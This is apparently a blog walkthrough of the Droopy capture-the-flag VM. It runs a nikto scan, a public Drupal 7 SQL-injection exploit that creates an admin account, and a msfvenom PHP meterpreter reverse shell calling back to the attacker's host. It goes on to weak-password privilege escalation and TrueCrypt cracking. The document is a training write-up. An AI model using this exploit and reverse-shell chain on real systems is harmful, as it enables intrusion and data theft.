Droopy CTF VM Walkthrough

Today I’m trying to get into the Droopy CTF Virtual machine. I’ll be enuntiating the steps I did to solve it.

So the first step is to scan the network for its IP address.

Only the port 80 was opened.

http

By running nikto I found:

root@pss:~/ctf/droopyCTF# nikto -h http://192.168.1.35
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.35
+ Target Hostname:    192.168.1.35
+ Target Port:        80
+ Start Time:         2017-03-27 18:46:30 (GMT-3)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /scripts/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x60e 0x4fef78de7d280 
+ OSVDB-3268: /includes/: Directory indexing found.
+ Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /misc/: Directory indexing found.
+ Entry '/misc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /modules/: Directory indexing found.
+ Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /profiles/: Directory indexing found.
+ Entry '/profiles/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/scripts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /themes/: Directory indexing found.
+ Entry '/themes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 36 entries which should be manually viewed.
+ Multiple index files found: /index.php, /index.html
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /scripts/: This might be interesting... possibly a system shell found.
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-3268: /sites/: Directory indexing found.
+ 8383 requests: 0 error(s) and 52 item(s) reported on remote host
+ End Time:           2017-03-27 18:47:28 (GMT-3) (58 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

A “drupal 7” search on exploit-db gave me a bunch of options to try. I chosed this one:

https://www.exploit-db.com/exploits/34992/
root@pss:~/ctf/droopyCTF# python 34992.py -t http://192.168.1.35 -u admin -p admin

  ______                          __     _______  _______ _____    
 |   _  \ .----.--.--.-----.---.-|  |   |   _   ||   _   | _   |   
 |.  |   \|   _|  |  |  _  |  _  |  |   |___|   _|___|   |.|   |   
 |.  |    |__| |_____|   __|___._|__|      /   |___(__   `-|.  |   
 |:  1    /          |__|                 |   |  |:  1   | |:  |   
 |::.. . /                                |   |  |::.. . | |::.|   
 `------'                                 `---'  `-------' `---'   
  _______       __     ___       __            __   __             
 |   _   .-----|  |   |   .-----|__.-----.----|  |_|__.-----.-----.
 |   1___|  _  |  |   |.  |     |  |  -__|  __|   _|  |  _  |     |
 |____   |__   |__|   |.  |__|__|  |_____|____|____|__|_____|__|__|
 |:  1   |  |__|      |:  |    |___|                               
 |::.. . |            |::.|                                        
 `-------'            `---'                                        
                                                                   
                                 Drup4l => 7.0 <= 7.31 Sql-1nj3ct10n
                                              Admin 4cc0unt cr3at0r

			  Discovered by:

			  Stefan  Horst
                         (CVE-2014-3704)

                           Written by:

                         Claudio Viviani

                      http://www.homelab.it

                         info@homelab.it
                     homelabit@protonmail.ch

                 https://www.facebook.com/homelabit
                   https://twitter.com/homelabit
                 https://plus.google.com/+HomelabIt1/
       https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww


[!] VULNERABLE!

[!] Administrator user created!

[*] Login: admin
[*] Pass: admin
[*] Url: http://192.168.1.35/?q=node&destination=node

So now I have credentials to login and upload a reverse shell, let’s do so. But first I needed to make a little trick to allow php content to be ran by updating the PHP filter config and creating a page with php text format.

Logged in Enabling the php filter Added php code text format

I created a reverse shell with msfvenom as follows:

root@pss:~/ctf/droopyCTF# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.38 LPORT=6000 R > shell.txt 
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 948 bytes

And added the page to the site :)

Logged in

root@pss:~/ctf/droopyCTF# msfconsole 
                                                  

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.com


Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.13.21-dev                         ]
+ -- --=[ 1621 exploits - 924 auxiliary - 282 post        ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use 
Display all 3347 possibilities? (y or n)
msf > use p
Display all 754 possibilities? (y or n)
msf > use 
Display all 3347 possibilities? (y or n)Interrupt: use the 'exit' command to quit
msf > use exploit/multi/handler 
msf exploit(handler) > set payload phpInterrupt: use the 'exit' command to quit
msf exploit(handler) > use payload php/meterpreter/reverse_tcp

^C[-] Error while running command use: 
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.38
LHOST => 192.168.1.38
msf exploit(handler) > set LPORT 6000
LPORT => 6000
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.38     yes       The listen address
   LPORT  6000             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.38:6000 
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 192.168.1.35
[*] Meterpreter session 1 opened (192.168.1.38:6000 -> 192.168.1.35:46294) at 2017-03-27 20:17:45 -0300

meterpreter > shell
Process 1211 created.
Channel 1 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

python -c 'import pty; pty.spawn("/bin/bash");'
www-data@droopy:/var/www/html$ 
www-data@droopy:/var/www/html$ su gsuser
su gsuser
Password: gsuser

gsuser@droopy:/var/www/html$ su
su
Password: toor

root@droopy:/var/www/html# cd ~
cd ~
root@droopy:~# ls -la
ls -la
total 5148
drwx------  3 root root    4096 Apr 12  2016 .
drwxr-xr-x 22 root root    4096 Apr 10  2016 ..
-rw-r--r--  1 root root    3106 Feb 20  2014 .bashrc
drwx------  2 root root    4096 Apr 10  2016 .cache
-rw-r--r--  1 root root 5242880 Apr 12  2016 dave.tc
-rw-r--r--  1 root root     140 Feb 20  2014 .profile
-rw-------  1 root root    3771 Apr 11  2016 .viminfo

The main issue with this VM is that the passwords were too weak, a couple of tries for the gsuser, and after playing a bit with the root account I found it had the same default root password the kali images for BeagleBone and Rasberry, toor.

I copied dave.tc to the webroot, and downloaded it to my kali box.

Logged in

dave.tc is a TrueCrypt volume, so I cracked its password with truecrack -t dave.tc --wordlist dict.txt which took a hell of a time… The password was etonacademy.

Downloaded TrueCrypt from https://sourceforge.net/projects/truecrypt/files/TrueCrypt/Other/TrueCrypt-7.2-Linux-x86.tar.gz/download, and mounted the volume using the mentioned password…

Logged in

and… Done! Got the flag!

root@pss:~# cd /media/truecrypt1/
root@pss:/media/truecrypt1# ls -la
total 20
drwxr-xr-x 6 root root  1024 Apr 12  2016 .
drwxr-xr-x 4 root root  4096 Mar 28 17:30 ..
drwxr-xr-x 2 root root  1024 Apr 12  2016 buller
drwx------ 2 root root 12288 Apr 12  2016 lost+found
drwxr-xr-x 2 root root  1024 Apr 12  2016 panama
drwxr-xr-x 3 root root  1024 Apr 12  2016 .secret
root@pss:/media/truecrypt1# cat .secret/
piers.png  .top/
root@pss:/media/truecrypt1# cat .secret/.top/flag.txt 

################################################################################
#   ___ ___  _  _  ___ ___    _ _____ _   _ _      _ _____ ___ ___  _  _  ___  #
#  / __/ _ \| \| |/ __| _ \  /_\_   _| | | | |    /_\_   _|_ _/ _ \| \| |/ __| #
# | (_| (_) | .` | (_ |   / / _ \| | | |_| | |__ / _ \| |  | | (_) | .` |\__ \ #
#  \___\___/|_|\_|\___|_|_\/_/ \_\_|  \___/|____/_/ \_\_| |___\___/|_|\_||___/ #
#                                                                              #
################################################################################

Firstly, thanks for trying this VM. If you have rooted it, well done!

Shout-outs go to #vulnhub for hosting a great learning tool. A special thanks
goes to barrebas and junken for help in testing and final configuration.
                                                                    --knightmare
root@pss:/media/truecrypt1#